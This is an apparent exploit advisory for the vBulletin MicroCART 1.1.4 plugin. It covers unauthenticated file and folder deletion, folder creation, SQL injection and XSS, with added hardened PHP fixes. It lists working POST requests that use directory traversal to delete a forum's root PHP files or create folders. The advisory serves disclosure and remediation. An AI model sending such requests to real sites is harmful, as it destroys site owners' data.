# Exploit Title: vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS
# Date: January 8, 2015
# Exploit Author: Technidev (https://technidev.com)
# Vendor Homepage: https://vbulletin.com
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=256723
# Version: 1.1.4
This plugin is fairly old but still used by a lot of people; it received its last update nearly 4 years ago.
It is vulnerable to arbitrary file deletion and SQL injection.

*Arbitrary File(s) Deletion*
In /microcart/editor/assetmanager/ there are a number of files which are probably used to let the administrator manage files and folders. Unfortunately, no authentication check was added to confirm that the user should have access to them, and the request parameters are not validated for anything malicious.
The /microcart/editor/assetmanager/folderdel_.php file contains the following at the top:
    $sMsg = "";
    if (isset($_POST["inpCurrFolder"])) {
        $sDestination = pathinfo($_POST["inpCurrFolder"]);
        //DELETE ALL FILES IF FOLDER NOT EMPTY
        $dir = $_POST["inpCurrFolder"];
        $handle = opendir($dir);
        while ($file = readdir($handle))
            if ($file != "." && $file != "..")
                unlink($dir . "/" . $file);
        closedir($handle);
        if (rmdir($_POST["inpCurrFolder"]) == 0)
            $sMsg = "";
        else
            $sMsg = "<script>document.write(getTxt('Folder deleted.'))</script>";
    }
By simply sending a POST request to this file, we can delete every single file in the specified folder.
POST to: /microcart/editor/assetmanager/folderdel_.php
POST data: inpCurrFolder: ../../../
This POST request will delete every single .php file in the root folder of vBulletin.

*Arbitrary File Deletion*
There is another vulnerability which resides in the /microcart/editor/assetmanager/assetmanager.php file. It contains an upload function, which is safe, and a file deletion function, which is not safe. We can delete any file off the server by abusing this. So unlike the previous vulnerability, which deletes all files in a folder given a folder value in the POST request, this one deletes only a single file off the server.
Vulnerable code:
    if (isset($_POST["inpFileToDelete"])) {
        $filename = pathinfo($_POST["inpFileToDelete"]);
        $filename = $filename['basename'];
        if ($filename != "")
            unlink($currFolder . "/" . $filename);
        $sMsg = "";
    }
Exploited by sending the following request:
POST to: /microcart/editor/assetmanager/assetmanager.php
POST data: inpCurrFolder: ../../../
inpFileToDelete: index.php
This will delete the /index.php file of vBulletin, in the root.

*Arbitrary Folder Creation*
Besides the file deletion, there is a file called /microcart/editor/assetmanager/foldernew.php which creates a folder with 0755 permissions on the server.
The file contains the following at the top:
    $sMsg = "";
    if (isset($_POST["inpNewFolderName"])) {
        $sFolder = $_POST["inpCurrFolder"] . "/" . $_POST["inpNewFolderName"];
        if (is_dir($sFolder) == 1) {
            //folder already exist
            $sMsg = "<script>document.write(getTxt('Folder already exists.'))</script>";
        } else {
            //if(mkdir($sFolder))
            if (mkdir($sFolder, 0755))
                $sMsg = "<script>document.write(getTxt('Folder created.'))</script>";
            else
                $sMsg = "<script>document.write(getTxt('Invalid input.'))</script>";
        }
    }
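All three handlers shown so far (folderdel_.php, assetmanager.php and foldernew.php) fail for the same two reasons: nothing checks who is sending the request, and inpCurrFolder is handed to the filesystem exactly as received, so a value such as ../../../ walks out of the asset directory. The following is an added, hardened rewrite of the three operations. It is example code, not MicroCART's or vBulletin's; ASSET_ROOT, is_admin_session() and the $_SESSION['is_admin'] key it reads are assumptions standing in for the forum's real permission check.

```php
<?php
// Added example (not MicroCART's code): the three asset-manager operations
// with the two controls the original handlers lack, an authentication check
// and confinement of every path to the intended asset directory.
// ASSET_ROOT, is_admin_session() and the $_SESSION['is_admin'] key are
// assumptions for this example; real code would use vBulletin's own
// session and permission data.
declare(strict_types=1);

const ASSET_ROOT = __DIR__ . '/assets';   // assumed upload directory

/** Assumed session hook; a real handler would consult the forum's userinfo. */
function is_admin_session(): bool
{
    return isset($_SESSION['is_admin']) && $_SESSION['is_admin'] === true;
}

/**
 * Resolve a user-supplied folder and return its absolute path only if it is
 * ASSET_ROOT itself or strictly below it; null otherwise. realpath() collapses
 * "..", "." and symlinks, so "../../../" can no longer escape the root.
 */
function confine_to_root(string $userPath): ?string
{
    $root = realpath(ASSET_ROOT);
    if ($root === false || strpos($userPath, "\0") !== false) {
        return null;
    }
    $candidate = realpath($root . '/' . $userPath);
    if ($candidate === false) {
        return null;                         // does not exist, nothing to act on
    }
    if ($candidate !== $root && strpos($candidate, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;                         // resolved outside the root
    }
    return $candidate;
}

/** folderdel_.php equivalent: empty and remove one folder below the root. */
function delete_folder(string $folder): bool
{
    $dir = confine_to_root($folder);
    if ($dir === null || $dir === realpath(ASSET_ROOT) || !is_dir($dir)) {
        return false;
    }
    foreach (scandir($dir) as $entry) {
        if ($entry === '.' || $entry === '..') {
            continue;
        }
        $path = $dir . '/' . $entry;
        if (is_file($path)) {
            unlink($path);                   // no recursion into subfolders
        }
    }
    return rmdir($dir);
}

/** assetmanager.php equivalent: remove one regular file inside a confined folder. */
function delete_file(string $folder, string $name): bool
{
    $dir = confine_to_root($folder);
    // basename() was the original's only check; it still honoured an attacker-chosen folder.
    if ($dir === null || $name === '' || $name !== basename($name)) {
        return false;
    }
    $target = $dir . '/' . $name;
    return is_file($target) && unlink($target);
}

/** foldernew.php equivalent: the new name is a plain identifier, the parent is confined. */
function create_folder(string $folder, string $name): bool
{
    $dir = confine_to_root($folder);
    if ($dir === null || !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name)) {
        return false;
    }
    $target = $dir . '/' . $name;
    return !is_dir($target) && mkdir($target, 0755);
}

// Dispatcher: refuse the request before any filesystem call if not authenticated.
if (PHP_SAPI !== 'cli') {
    session_start();
    if (!is_admin_session()) {
        http_response_code(403);
        exit('Forbidden');
    }
    $folder = (string) ($_POST['inpCurrFolder'] ?? '');
    if (isset($_POST['inpFileToDelete'])) {
        $ok = delete_file($folder, (string) $_POST['inpFileToDelete']);
    } elseif (isset($_POST['inpNewFolderName'])) {
        $ok = create_folder($folder, (string) $_POST['inpNewFolderName']);
    } else {
        $ok = delete_folder($folder);
    }
    echo $ok ? 'OK' : 'Rejected';
}
```

confine_to_root() does the real work: the folder is resolved with realpath() and refused unless it is the asset root or a path strictly below it, so each of the requests in this advisory ends in a Rejected response before any file is touched. The authentication gate sits in front of all three operations rather than inside each one, which is the check the original files never had. MicroCART's own foldernew.php has none of this, which is what the request that follows relies on.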
By sending the following POST request, we will create a folder with 0755 permissions.
POST to: /microcart/editor/assetmanager/foldernew.php
POST data: inpNewFolderName: davewashere
inpCurrFolder: ../../..
This POST request will create the folder davewashere in the root of the vBulletin forum.

*SQL Injection*
MicroCART is also vulnerable to SQL injection at several locations, although most of them are rather hard to abuse. I will not explain how to exploit it, but the vulnerability can be found in /cart.php at lines 833 to 881 and in the function where products are added to the shopping cart, around lines 1251 to 1328, where $_POST['fields'] is assigned to the configuration variable which is later used in a query.

*Cross Site Scripting*
When modifying your information at /cart.php?do=cpanel, you can inject anything you want into the fields.
Viewing reviews of products may be vulnerable as well when you leave out the wysiwyg POST key.
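For the SQL injection and cross-site scripting findings above, here is an added example of the two standard fixes; it is not MicroCART's code. The add-to-cart path is rewritten with a parameterised query so the fields value never becomes part of the SQL text, and a single output-encoding helper is applied to anything echoed back at /cart.php?do=cpanel or in the review view. The cart_item table, its columns and the in-memory SQLite store are assumptions chosen so the script runs without the forum's MySQL database.

```php
<?php
// Added example, not MicroCART's code. It shows the fixes for the two remaining
// findings: a parameterised query for the add-to-cart path (the original hands
// $_POST['fields'] to a query as a string) and output encoding for profile and
// review text echoed back at /cart.php?do=cpanel. Table and column names are
// assumptions; an in-memory SQLite database stands in for the forum's MySQL so
// the script runs on its own.
declare(strict_types=1);

function open_store(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE cart_item (
        id INTEGER PRIMARY KEY,
        userid INTEGER NOT NULL,
        productid INTEGER NOT NULL,
        fields TEXT NOT NULL)');
    return $db;
}

/** Vulnerable shape, shown for contrast and never called: user text becomes SQL. */
function add_to_cart_unsafe(PDO $db, int $userid, int $productid, string $fields): void
{
    $db->exec("INSERT INTO cart_item (userid, productid, fields)
               VALUES ($userid, $productid, '$fields')");
}

/** Hardened: placeholders keep the value out of the SQL grammar entirely. */
function add_to_cart(PDO $db, int $userid, int $productid, string $fields): int
{
    $stmt = $db->prepare('INSERT INTO cart_item (userid, productid, fields)
                          VALUES (:u, :p, :f)');
    $stmt->execute([':u' => $userid, ':p' => $productid, ':f' => $fields]);
    return (int) $db->lastInsertId();
}

/** Read one row back, also through a prepared statement. */
function read_fields(PDO $db, int $id): ?string
{
    $stmt = $db->prepare('SELECT fields FROM cart_item WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $value = $stmt->fetchColumn();
    return $value === false ? null : (string) $value;
}

/**
 * Output encoding for anything echoed into HTML. It runs at output time, so it
 * holds no matter what the client sent or whether the wysiwyg key was present.
 */
function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed test value carrying both a SQL quote and an HTML tag.
$hostile = "O'Brien\"><script>alert(1)</script>";

$db = open_store();
$id = add_to_cart($db, 7, 42, $hostile);
$stored = read_fields($db, $id);

echo 'stored verbatim:  ', var_export($stored === $hostile, true), "\n";
echo 'rows in table:    ', $db->query('SELECT COUNT(*) FROM cart_item')->fetchColumn(), "\n";
echo 'as shown in HTML: ', html($stored), "\n";
```

The unsafe variant is kept only to show the shape the advisory describes: with the constructed value its single quote would end the string literal early and the remainder would be parsed as SQL. The hardened path stores the value byte for byte, and html() neutralises the tag when the value is displayed, which is the same control for the cpanel fields and for the review view whether or not the wysiwyg key is sent.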